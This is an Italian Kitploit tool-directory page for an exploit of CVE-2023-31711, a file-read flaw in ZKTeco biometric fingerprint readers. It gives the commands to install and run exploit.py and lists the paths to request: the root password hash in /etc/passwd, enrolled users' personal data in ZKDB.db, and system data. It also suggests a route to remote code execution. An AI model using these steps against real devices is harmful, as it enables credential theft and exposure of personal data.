Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-31711 — Vulnerabilità zero-day nel lettore biometrico di impronte digitali ZKTEco. | Kitploit
Strumenti/GitHubGitHub/hritikthapa7/cve-2023-31711
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniPenetration Testing
GitHubhritikthapa7/cve-2023-31711

CVE-2023-31711

Vulnerabilità zero-day nel lettore biometrico di impronte digitali ZKTEco.

Vedi Repository
2223 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-31711

Controllo degli accessi non corretto in ZKTECO consente ad attaccanti remoti di leggere qualsiasi file tramite l'API amministrativa.

Installazione dei moduli richiesti

  • All'interno della directory ZKTEco:
    $ pip install -r ./pyzatt/requirements_dev.txt

Esecuzione dell'exploit

  • All'interno della directory ZKTEco:
    $ python exploit.py <ip_address>
    Connected to 10.0.2.25
    (Cmd) get_file <file_name>
    Esempi:
    get_file /etc/passwd: Divulga l'hash della password di root
    get_file /mnt/mtdblock/data/ZKDB.db: Divulga le PII degli utenti registrati. Per leggere il contenuto, potrebbe essere necessario eseguire questo comando in sequenza più volte finché l'intero contenuto
    venga divulgato
    get_file /mnt/mtdblock/data/ZKSystem.db: Divulga informazioni sensibili relative al sistema

Crediti

Exploit:

https://github.com/ProCheckUp/SafeScan

Modulo Pyzatt: https://github.com/adrobinoga/pyzatt

Nota

I dispositivi potrebbero essere potenzialmente vulnerabili anche a Remote Code Execution tramite l'uso dell'API amministrativa. L'exploit menzionato nella sezione Crediti potrebbe essere un buon punto di partenza per trovare un test per questa vulnerabilità.

Scarica lo strumento